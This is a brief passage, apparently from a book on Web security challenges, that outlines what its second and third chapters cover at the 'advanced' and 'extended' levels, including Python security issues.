Chapters 2 and 3 will introduce other common vulnerabilities involved in Web challenges at the "advanced" and "extended" levels. The "advanced" level requires readers to have a certain foundation and experience, and it involves more complex vulnerabilities and technical points; the "extended" level involves more features related to Web challenges, such as Python security issues.